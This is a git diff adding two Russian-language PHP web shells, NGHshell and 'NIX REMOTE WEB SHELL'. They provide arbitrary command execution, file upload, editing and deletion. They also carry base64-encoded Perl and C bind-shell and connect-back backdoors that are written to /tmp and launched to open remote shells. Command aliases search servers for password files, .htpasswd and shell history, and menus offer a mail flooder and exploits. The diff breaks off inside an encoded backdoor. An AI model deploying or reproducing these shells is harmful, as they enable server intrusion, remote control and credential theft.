+          ."OnAQQgEAENHDDTAU0IKFI2Qgz58d/JgCAA8AYagRALxQRBVNMJSIDQ4QAYM8B9yAAxEAtEACCX4moIOYChTwQgiDPkAkEIgqWgUT"
+          ."einSQA4/RAaAGAswUCoSRwCgwBEKzhBCDDRsUOqpqfbgBKuLvPqDELrOasGtQQBQww7UMpjlB4MOkMK2OSRqLLKuwhrZAzUQOmxz"
+          ."C5hgAgyZyKDBoH/++cKd4CaiLLMPVKCAtIQOga66AxUg8LsAHLDAweXOe0O9iDTgQArjBjCYPKYyi4D/uj/AsIE8IJRqKKreLtzq"
+          ."ow+PCwEDD1A8XQLSUkvCxgB4MOgLQOCAQ6o3VHHFyIjYsAArhEaghVqESlDmvgm0wDIAHYSQqs2XZuqEzjwf4rMQSrg0wT8OvGCD"
+          ."CRbskEIS+ybKAwc6/OB1jU8Y0YIMVUhxhaOIsHACByD0wMANOHqY5Y48guiBnChkwPYNTkxdBRVRZLHFkojY96IIDPQ9wt+CDz4h"
+          ."hCy0UEQRiS9OhRSNY/E4I+O9yAAJfgPugeaEs4BAB6BPPTrpWWABBRRbaLdIgAjM3sHwBxA//PG0g764FLjnvrsVS/jOSBJdDOke"
+          ."igj28MTnyi8fRem7Q2EFc/TSL5KEEdcjyIX2T2wfOhWjl667+OOTL0oSQpyIPRftu2874/J7Xv3s9wj8TUd9/Gtf7USHOyzMb4Dj"
+          ."i9791GQEIliQCEzIYAavwMErbOGDIFzCFpZAwhKWTxEdGIAKV8jCFrrwhStMhwxnSMMa2tAQgQAAOw==";
+/* bd.pl ********************************/
+   $bind = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNU"
+          ."RU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMs"
+          ."JlBGX0lORVQsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0"
+          ."KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkp"
+          ."KSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hp"
+          ."bGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZp"
+          ."bmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09O"
+          ."TiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpl"
+          ."eGl0IDA7DQp9DQp9";
+/* connectback-backdoor on perl ********/
+   $backcon = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj"
+          ."aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1p"
+          ."bmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIp"
+          ."IHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9J"
+          ."TkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8"
+          ."fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsN"
+          ."Cm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7"
+          ."DQpjbG9zZShTVERFUlIpOw==";
+
+if ($act == "showlogo") {
+ header("Content-type: image/gif");
+ echo base64_decode($logo);
+ exit;
+}
+if ($login) {
+ Sleep(1);
+ if ($luser == $user && $lpass == $pass) {
+  setcookie("logined", $pass);
+ } else {
+  die("<font color=#DF0000>Login error</font>");
+ }
+} else {
+ $logined = @$_COOKIE['logined'];
+ if ($logined != $pass) {
+?>
+ <form action=<?=$script?> method=POST>
+ user: <input type=text name=user><br>
+ pass: <input type=password name=pass><br><br>
+ <input type=submit name=login value=login>
+ </form>
+<?
+  exit;
+ }
+}
+?>
+ <html>
+ <head>
+ <style type="text/css"><!--
+ body {background-color: #cccccc; color: #000000; FONT-SIZE: 10pt}
+ body, td, th, h1, h2 {font-family: Verdana;}
+ pre {margin: 0px; font-family: monospace;}
+ a:link {color: #000099; text-decoration: none;}
+ a:visited {color: #000099; text-decoration: none;}
+ a:hover {text-decoration: underline;}
+ table {border-collapse: collapse;}
+ td, th { border: 1px solid #000000; font-size: 75%; vertical-align: baseline;}
+ .e {background-color: #ccccff; font-weight: bold; color: #000000;}
+ .h {background-color: #9999cc; font-weight: bold; color: #000000;}
+ .v {background-color: #cccccc; color: #000000;}
+ .v2 {background-color: #dfdfdf; color: #000000;}
+ .v3 {background-color: #FEB4BB; color: #000000;}
+ i {color: #666666; background-color: #cccccc;}
+ img {float: right; border: 0px;}
+ hr {width: 600px; background-color: #cccccc; border: 0px; height: 1px; color: #000000;}
+ input, textarea {FONT-SIZE: 8pt; border: 1px solid #222222; color: #222222; background-color: #dfdfdf; }
+ //--></style>
+ <title>Webcommander at <?=$_SERVER["HTTP_HOST"]?></title>
+ </head>
+ <body>
+<?
+$path = @rawurldecode($_GET['dir']);
+$cmd = @$_GET['cmd'];
+if ($act == "mass") {
+ $post = array_keys($_POST);
+ $todo = $_POST[$post[sizeof($post)-2]];
+ $to = $_POST[$post[sizeof($post)-1]];
+ for ($i = 0; $i < sizeof($post)-2; $i++) {
+  if ($_POST[$post[$i]]) {
+   if ($todo == "del") {
+    rm($_POST[$post[$i]]);
+   }
+   elseif ($todo == "mv") {
+    mvcp($_POST[$post[$i]], $to."/".$post[$i], $todo);
+   }
+   else {
+    mvcp($_POST[$post[$i]], $to."/".$post[$i], "cp");
+   }
+  }
+ }
+ //exit;
+}
+elseif ($act == mkdir) {
+ $dirname = @$_POST['dirname'];
+ $path = @$_POST['dir'];
+ if (!$dirname) die("<font color=#DF0000>Âåäèòå èìÿ</font>\n");
+ if (!@mkdir($path.$dirname)) die("<font color=#DF0000>Íåìîãó ñîçäàòü ïàïêó</font>\n");
+}
+elseif ($act == upload) {
+ $userfile = @$_FILES['userfile']['tmp_name'];
+ $uploaddir = @$_POST['uploaddir'];
+ if (is_uploaded_file($userfile))  {
+  @copy($userfile, $uploaddir.$_FILES['userfile']['name']);
+  @unlink($userfile);
+  $path = $uploaddir;
+ } else die("<font color=#DF0000>Îøèáêà ïðè çàãðóçêå ôàéëà</font>\n");
+}
+elseif ($act == "rm") {
+ $name = @$_GET['name'];
+ rm($name);
+ $inf = pathinfo($name);
+ $path = $inf['dirname'];
+}
+elseif ($act == "viev") {
+ $name = @$_GET['name'];
+ if (file_exists($name)) {
+  echo "<form action=".$script."?act=updatefile method=POST>\n".
+       "ôàéë <b>".$name."</b><br>\n";
+  $out = implode("", file($name));
+  echo "<textarea rows=25 cols=70 name=text>";
+  print_r ($out);
+  echo "</textarea><br>\n".
+       "<input type=hidden name=file value=\"".$name."\">\n".
+       "<input type=submit value=ñîõðàíèòü>\n".
+       "</form>\n".
+       "[ <a href=javascript:history.go(-1)>back</a> ]";
+ } else die("<font color=#DF0000>Ôàéë íå íàéäåí</font>\n");
+ exit;
+}
+elseif ($act == "updatefile") {
+ $filename = @$_POST['file'];
+ $text = @$_POST['text'];
+ if (is_writable($filename)) {
+  $handle = fopen($filename, "w+");
+  if (fwrite($handle, stripslashes($text)) === FALSE) {
+   die("<font color=#DF0000>Îøèáêà çàïèñè â ôàéë</font>\n");
+  }
+ } else die("<font color=#DF0000>Ôàéë íåäîñòóïåí äëÿ çàïèñè</font>\n");
+ fclose($handle);
+ $inf = pathinfo($filename);
+ $path = $inf['dirname'];
+}
+elseif ($act == "touch") {
+ $userfile = @$_POST['file'];
+ $userdir = @$_POST['dir'];
+ if (!$userfile) {
+  die("<font color=#DF0000>Âåäèòå èìÿ</font>\n");
+ }
+ $handle = fopen($userdir.$userfile, "w+");
+ if (fwrite($handle, "") === FALSE)  {
+   die("<font color=#DF0000>Îøèáêà ñîçäàíèÿ ôàéëà</font>\n");
+ }
+ fclose($handle);
+ $path = $userdir;
+}
+elseif ($act == "renameform") {
+ $name = @$_GET['name'];
+ echo "<form action=".$script."?act=rename method=POST>"
+     ."<b>Ïåðåèìåíîâàòü, êîïèðîâàòü èëè ïåðåìåñòèòü </b>".$name."<br>"
+     ."<input type=text name=to size=40 value=".$name.">"
+     ."<input type=hidden name=from value=".$name."><br>"
+     ."<input type=radio name=todo value=mv checked> ïåðåìåñòèòü<br>"
+     ."<input type=radio name=todo value=cp> ñêîïèðîâàòü<br>"
+     ."<input type=submit value=Go></form>"
+     ."[ <a href=javascript:history.go(-1)>back</a> ]";
+ exit;
+}
+elseif ($act == "rename") {
+ $from = @$_POST['from'];
+ $to = @$_POST['to'];
+ $todo = @$_POST['todo'];
+ mvcp($from, $to, $todo);
+ $inf = pathinfo($from);
+ $path = $inf['dirname'];
+}
+elseif ($act == "bindshell") {
+ $port = @$_POST['port'];
+ if (!$port) {
+  die("<font color=#DF0000>Óêàæèòå ïîðò</font>");
+ }
+ $file = "/tmp/bd";
+ $handle = fopen($file, "w+");
+ if (fputs($handle, base64_decode($bind)) === FALSE)  {
+   die("<font color=#DF0000>Îøèáêà ñîçäàíèÿ ôàéëà ".$file."</font>\n");
+ } else {
+  fclose($handle);
+  passthru("perl ".$file." ".$port." > /dev/null &");
+ }
+}
+elseif ($act == "backconnect") {
+ $port = @$_POST['port'];
+ $addr = @$_POST['addr'];
+ if (!$port || !$addr) {
+  die("<font color=#DF0000>Óêàæèòå ïîðò è àäðåññ</font>");
+ }
+ $file = "/tmp/bcon";
+ $handle = fopen($file, "w+");
+ if (fputs($handle, base64_decode($backcon)) === FALSE)  {
+   die("<font color=#DF0000>Îøèáêà ñîçäàíèÿ ôàéëà  ".$file."</font>\n");
+ } else {
+  fclose($handle);
+  passthru("perl ".$file." ".$addr." ".$port." > /dev/null &");
+ }
+}
+elseif ($act == "phpinfo") {
+ phpinfo();
+ exit;
+}
+if (!$path) {
+ $dir = getcwd()."/";
+} else {
+ $dir = stripslashes($path);
+ if ($dir[strlen($dir)-1] != "/") $dir .= "/";
+}
+$dir = str_replace("\\", "/", $dir);
+$dir = str_replace("//", "/", $dir);
+$arr = explode("/", $dir);
+for ($i=0; $i<count($arr)-2; $i++) {
+ $back .= $arr[$i]."/";
+}
+?>
+ <table class=e>
+  <tr>
+   <td rowspan=3><img src=<?=$script?>?act=showlogo></td>
+   <td><b>Host:</b></td><td class=v><?=$_SERVER["HTTP_HOST"]?></td>
+  </tr>
+  <tr>
+   <td><b>IP address:</b></td><td class=v><?=$_SERVER["SERVER_ADDR"]?></td>
+  </tr>
+  <tr>
+   <td><b>Software:</b></td><td class=v><?=$_SERVER["SERVER_SOFTWARE"]?></td>
+  </tr>
+ </table>
+ <form action=<?=$script?> method=GET>
+ <b>Êîìàíäà:</b> <input type=text name=cmd value="<?=$cmd?>" size=120>
+ <input type=hidden name=dir value="<?=$dir?>"><br>
+ <textarea rows=8 cols=97>
+<?
+if ($cmd) {
+ exec($cmd, $out);
+ echo convert_cyr_string(implode("\r\n", $out), "a", "w");
+}
+?>
+</textarea></form>
+<form action=<?=$script?>?act=bindshell method=POST>
+<b>Bind /bin/bash at port: </b><input type=text name=port size=8>
+<input type=submit value=Bind>
+</form>
+<form action=<?=$script?>?act=backconnect method=POST>
+<b>Connectback:</b> Àäðåññ <input type=text name=addr>
+Ïîðò <input type=text name=port size=8>
+<input type=submit value=Connect>
+</form>
+<?
+if($handle = @opendir($dir)) {
+?>
+ <form action=<?=$script?>?act=mass method=POST>
+ <table width=700>
+ <tr class=e><td colspan=7><b><?=$dir?></b></td></tr>
+ <tr class=h><td><a href="<?=$script?>?dir=<?=$back?>"><<</a></td>
+ <td><small><font color=#D1D1E1>size</font></small></td>
+ <td><small><font color=#D1D1E1>date</font></small></td>
+ <td colspan=4><small><font color=#D1D1E1>permissions</font></small></td></tr>
+<?
+ $cssclass = "v";
+ while ($file = readdir($handle)) {
+  if (is_dir($dir.$file) && $file != ".." && $file != ".") {
+   $inf = pathinfo($dir.$file);
+   echo "<tr class=".$cssclass." onmouseover=\"className='v3'\"  onmouseout=\"className='".$cssclass."'\">\n"
+       ."<td><input type=checkbox name=".$file." value=".$dir.$file.">"
+       ."[<a href=\"".$script."?dir=".rawurlencode($inf['dirname'])."/".rawurlencode($inf['basename'])."\">"
+       .$file."</a>]</td><td><b>--dir</b></td><td>".date("d.m.y/H:i", filemtime($dir.$file))."</td>\n"
+       ."<td>".parseperms(fileperms($dir.$file))."</td>\n"
+       ."<td><a href=\"".$script."?act=rm&name=".rawurlencode($dir.$file)."\">DEL</a></td>\n"
+       ."<td colspan=2><a href=\"".$script."?act=renameform&name=".rawurlencode($dir.$file)."\">MOVE(COPY)</a></td></tr>\n";
+   if ($cssclass == "v") $cssclass = "v2";
+   elseif ($cssclass == "v2") $cssclass = "v";
+  }
+ }
+ rewinddir($handle);
+ while ($file = readdir($handle)) {
+  if (is_file($dir.$file)) {
+   echo "<tr class=".$cssclass." onmouseover=\"className='v3'\"  onmouseout=\"className='".$cssclass."'\">\n"
+       ."<td><input type=checkbox name=".$file." value=".$dir.$file.">"
+       ."[".$file."]</td><td>".filesize($dir.$file)."</td><td>\n"
+       .date("d.m.y/H:i", filemtime($dir.$file))."</td>\n"
+       ."<td>".parseperms(fileperms($dir.$file))."</td>\n"
+       ."<td><a href=\"".$script."?act=rm&name=".rawurlencode($dir.$file)."\">DEL</a></td>\n"
+       ."<td><a href=\"".$script."?act=renameform&name=".rawurlencode($dir.$file)."\">MOVE(COPY)</a></td>\n"
+       ."<td><a href=\"".$script."?act=viev&name=".rawurlencode($dir.$file)."\">EDIT</a></td></tr>\n";
+   if ($cssclass == "v") $cssclass = "v2";
+   elseif ($cssclass == "v2") $cssclass = "v";
+  }
+ }
+ closedir($handle);
+?>
+ </table>
+ <b>Ñ îòìå÷åíûìè:</b> <input type=radio name=mass value=del checked> Óäàëèòü
+ <b>[</b> <input type=radio name=mass value=mv> Ïåðåìåñòèòü
+ <input type=radio name=mass value=cp> Êîïèðîâàòü
+ â <input type=text name=to value="<?=$dir?>"> <b>]</b>
+ <br><input type=submit value=Âûïîëíèòü>
+ </form>
+ <form action=<?=$script?>?act=mkdir method=POST>
+ <b>Ñîçäàòü ïàïêó</b><br>
+ <input type=text name=dirname size=40>
+ <input type=hidden name=dir value="<?=$dir?>">
+ <input type=submit value=Ñîçäàòü></form>
+ <FORM ENCTYPE=multipart/form-data ACTION=<?=$script?>?act=touch METHOD=POST>
+ <b>Ñîçäàòü ïóñòîé ôàéë</b><br>
+ <INPUT type=text NAME=file size=40>
+ <input type=hidden name=dir value="<?=$dir?>">
+ <INPUT TYPE=submit VALUE=Ñîçäàòü></FORM>
+ <FORM ENCTYPE=multipart/form-data ACTION=<?=$script?>?act=upload METHOD=POST>
+ <b>Çàêà÷àòü ôàéë</b><br>
+ <INPUT NAME=userfile TYPE=file size=40>
+ <input type=hidden name=uploaddir value="<?=$dir?>">
+ <INPUT TYPE=submit VALUE=Îòïðàâèòü></FORM>
+ <a href=<?=$script?>?act=phpinfo>Phpinfo()</a>
+<?
+} else die("<font color=#DF0000>Äèðåêòîðèÿ íå íàéäåíà</font>\n");
+function rm($name) {
+ if (is_file($name)) {
+  if (!@unlink($name)) die("<font color=#DF0000>Íåìîãó óäàëèòü ôàéë <b>".$name."</b></font>\n");
+ }
+ elseif (is_dir($name)) deldir($name);
+}
+function mvcp($from, $to, $todo) {
+ if ($todo == "mv") {
+  if (is_file($from)) {
+   if (!rename($from, $to)) {
+    die("<font color=#DF0000>Îøèáêà ïðè ïåðåìåùåíèè ôàéëà ".$from."</font>");
+   }
+  }
+  elseif (is_dir($from)) {
+   mvdir($from, $to, $todo);
+  }
+ } else {
+  if (is_file($from)) {
+   if (!copy($from, $to)) {
+    die("<font color=#DF0000>Îøèáêà ïðè êîïèðîâàíèè ôàéëà ".$from."</font>");
+   }
+  }
+  elseif (is_dir($from)) {
+   mvdir($from, $to, "cp");
+  }
+ }
+}
+function deldir($name) {
+ if (@$handle=opendir($name)) {
+  while ($file = readdir($handle)) {
+   if ($file != ".." && $file != ".") {
+    if (is_file($name."/".$file)) {
+     unlink($name."/".$file);
+    }
+    elseif (is_dir($name."/".$file)) {
+     deldir($name."/".$file);
+    }
+   }
+  }
+  closedir($handle);
+ } else die("<font color=#DF0000>Íåìîãó óäàëèòü ïàïêó <b>".$name."</b></font>\n");
+ rmdir($name);
+}
+function mvdir($from, $to, $todo) {
+ if (@$handle = opendir($from)) {
+  mkdir($to);
+  while ($file = readdir($handle)) {
+   if ($file != ".." && $file != ".") {
+    if (is_file($from."/".$file)) {
+     if (!copy($from."/".$file, $to."/".$file)) {
+      die("<font color=#DF0000>Îøèáêà ïðè êîïèðîâàíèè ôàéëà ".$from."/".$file."</font>");
+     }
+    }
+    elseif (is_dir($from."/".$file)) {
+     mvdir($from."/".$file, $to."/".$file, $todo);
+    }
+   }
+  }
+  closedir($handle);
+  if ($todo == "mv") deldir($from);
+ } else die("<font color=#DF0000>Íåìîãó êîïèðîâàòü ïàïêó <b>".$name."</b></font>\n");
+}
+function parseperms($perms)
+{
+ if (!$perms) return "null";
+ if (($perms & 0xC000) == 0xC000) {
+    $info = 'socket ';
+ } elseif (($perms & 0xA000) == 0xA000) {
+    $info = 'link ';
+ } elseif (($perms & 0x8000) == 0x8000) {
+    $info = '-';
+ } elseif (($perms & 0x6000) == 0x6000) {
+    $info = 'b';
+ } elseif (($perms & 0x4000) == 0x4000) {
+    $info = 'dir ' ;
+ } elseif (($perms & 0x2000) == 0x2000) {
+    $info = 'c';
+ } elseif (($perms & 0x1000) == 0x1000) {
+    $info = 'p';
+ } else {
+    $info = 'u';
+ }
+ $info .= (($perms & 0x0100) ? 'r' : '-');
+ $info .= (($perms & 0x0080) ? 'w' : '-');
+ $info .= (($perms & 0x0040) ?
+            (($perms & 0x0800) ? 's' : 'x' ) :
+            (($perms & 0x0800) ? 'S' : '-'));
+ $info .= (($perms & 0x0020) ? 'r' : '-');
+ $info .= (($perms & 0x0010) ? 'w' : '-');
+ $info .= (($perms & 0x0008) ?
+            (($perms & 0x0400) ? 's' : 'x' ) :
+            (($perms & 0x0400) ? 'S' : '-'));
+ $info .= (($perms & 0x0004) ? 'r' : '-');
+ $info .= (($perms & 0x0002) ? 'w' : '-');
+ $info .= (($perms & 0x0001) ?
+            (($perms & 0x0200) ? 't' : 'x' ) :
+            (($perms & 0x0200) ? 'T' : '-'));
+ return $info;
+}
+echo "<br><small>NGHshell 0.3.9 by Cr4sh</body></html>\n";
+
+/* EOF **********************************/
+?>
diff --git a/xakep-shells/PHP/nixrem.php.php.txt b/xakep-shells/PHP/nixrem.php.php.txt
new file mode 100644
index 0000000..9688a5a
--- /dev/null
+++ b/xakep-shells/PHP/nixrem.php.php.txt
@@ -0,0 +1,1772 @@
+<?php
+#########################################################
+#                 NIX REMOTE WEB SHELL                  #
+#       Coded by DreAmeRz          Ver 1.0              # 
+#      ORIGINAL E-MAIL IS: dreamerz@mail.ru             #
+#                               
+#########################################################
+$name="1";	// ëîãèí ïîëüçîâàòåëÿ
+$pass="1";	// ïàðîëü ïîëüçîâàòåëÿ
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head>
+<title>NIX REMOTE WEB-SHELL v.1.0</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="pragma" content="no-cache">
+<meta http-equiv="Content-Language" content="en,ru"> 
+<META name="autor" content="DreAmeRz (www.Ru24-Team.NET)">
+<style type="text/css">
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+scrollbar-face-color: #FFFFFF;
+scrollbar-shadow-color:#000000 ;
+scrollbar-highlight-color:#FFFFFF;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color:#FFFFFF ;
+scrollbar-track-color: #FFFFFF;
+scrollbar-arrow-color: #000000;
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: red;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: black;
+TEXT-DECORATION: none
+}
+A:link {COLOR:black; TEXT-DECORATION: none}
+A:visited { COLOR:black; TEXT-DECORATION: none}
+A:active {COLOR:black; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+</HEAD>
+
+
+<BODY bgcolor="#fffcf9" text="#000000">
+<P align=center>[ <A href="javascript:history.next(+1)">Âïåðåä ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
+v.1.0<FONT color=#linux size=1> Stable </FONT> [ <A href="javascript:history.back(-1)">Íàçàä ]</A>[ <A href="?ac=about" title='×òî óìååò ñêðèïò...'>Î ñêðèïòå ]</a><BR>
+<A href="?ac=info" title='Óçíàé âñå îá ýòîé ñèñòåìå!'>[ Èíôîðìàöèÿ î ñèñòåìå</A> ][ <A href="?ac=navigation" title='Óäîáíàÿ ãðàôè÷åñêàÿ íàâèãàöèÿ. Ïðîñìîòð, ðåäàêòèðîâàíèå...'>Íàâèãàöèÿ</A> ][ <A href="?ac=backconnect" title='Óñòàíîâêà backconnect è îáû÷íîãî áåêäîðà '>Óñòàíîâêà
+áåêäîðà</A> ][ <A href="?ac=eval" title='Ñîçäàé ñâîé ñêðèïò íà php ïðÿìî çäåñü :)'>PHP-êîä</A> ][ <A href="?ac=upload" title='Çàãðóçêà îäíîãî ôàéëà, ìàñcîâàÿ çàãðóçêà, çàãðóçêà ôàéëîâ ñ óäàëåííîãî êîìïüþòåðà!'>Çàãðóçêà ôàéëîâ</A> ][ <A href="?ac=shell" title='bash shell, àëüÿñû...'>Èñïîëíåíèå
+êîìàíä ]</A> <br><A href="?ac=sql" title='Ðàáîòà ñ MySQL'> [ MySQL</A> ]<A href="?ac=sendmail" title='Îòïðàâü å-mail îòñþäà!'>[ Îòïðàâêà ïèñüìà</A> ][ <A href="?ac=mailfluder" title='Òåáÿ êòî-òî äîñòàë? Òîãäà òåáå ñþäà...'>Ìàèëôëóäåð</A>
+ ][ <A href="?ac=tools" title='Êîäèðîâùèêè/äåêîäèðîâùèêè md5, des, sha1, base64... '>Èíñòðóìåíòû ]</A>[ <A href="?ac=ps" title='Îòîáðàæàåò ñïèñîê ïðîöåññîâ íà ñåðâåðå è ïîçâîëÿåò èõ óáèâàòü!'>Äåìîíû</A> ][ <A href="?ac=art" title='Àëüòåðíàòèâíûå ìåòîäû âçëîìà...'>Àëüòåðíàòèâíûå ìåòîäû</A> ][ <A href="?ac=exploits" title='id=root gid=0 uid=0'>/root</A> ][ <A href="?ac=selfremover" title='Íàäîåë ýòîò ñåðâåð? Òîãäà ìîæíî óäàëèòü è øåëë...'>Óäàëèòü øåëë</A> ]</P>
+<?php
+if (ini_get('register_globals') != '1') {
+
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
+set_magic_quotes_runtime(0);
+set_time_limit(0);		// óáðàòü îãðàíè÷åíèå ïî âðåìåíè
+ignore_user_abort(1);	// èãíîðèðîâàòü ðàçðûâ ñâÿçè ñ áðàóçåðîì
+error_reporting(0);
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
+$aliases=array(
+'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
+'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî suid-áèòîì' => 'find / -type f -perm -04000 -ls',
+'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find / -type f -perm -02000 -ls',
+'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find . -type f -perm -02000 -ls',
+'ïîèñê íà ñåðâåðå ôàéëîâ config' => 'find / -type f -name "config*"',
+'ïîèñê íà ñåðâåðå ôàéëîâ admin' => 'find / -type f -name "admin*"',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config' => 'find . -type f -name "config*"',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ pass' => 'find . -type f -name "pass*"',
+'ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find / -perm -2 -ls',
+'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find . -perm -2 -ls',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd',
+'ïîèñê íà ñåðâåðå ôàéëîâ service.pwd' => 'find / -type f -name service.pwd',
+'ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd',
+'ïîèñê âñåõ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history',
+'ïîèñê âñåõ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc',
+'âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs' => 'lsattr -va',
+'ïðîñìîòð îòêðûòûõ ïîðòîâ' => 'netstat -an | grep -i listen',
+'ïîèñê âñåõ php-ôàéëîâ ñî ñëîâîì password' =>'find / -name *.php | xargs grep -li password',
+'ïîèñê ïàïîê ñ ìîäîì 777' =>'find / -type d -perm 0777',
+'Îïðåäåëåíèå âåðñèè ÎÑ' =>'sysctl -a | grep version',
+'Îïðåäåëåíèå âåðñèè ÿäðà' =>'cat /proc/version',
+'Ïðîñìîòð syslog.conf' =>'cat /etc/syslog.conf',
+'Ïðîñìîòð Message of the day' =>'cat /etc/motd',
+'Ïðîñìîòð hosts' =>'cat /etc/hosts',
+'Âåðñèÿ äèñòðèáóòèâà 1' =>'cat /etc/issue.net',
+'Âåðñèÿ äèñòðèáóòèâà 2' =>'cat /etc/*-realise',
+'Ïîêàçàòü âñå ïðîöåñû' =>'ps auxw',
+'Ïðîöåññû òåêóùåãî ïîëüçîâàòåëÿ' =>'ps ux',
+'Ïîèñê httpd.conf' =>'locate httpd.conf');
+
+
+
+/* Port bind source */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
+jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
+ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
+0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
+mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
+KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
+hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
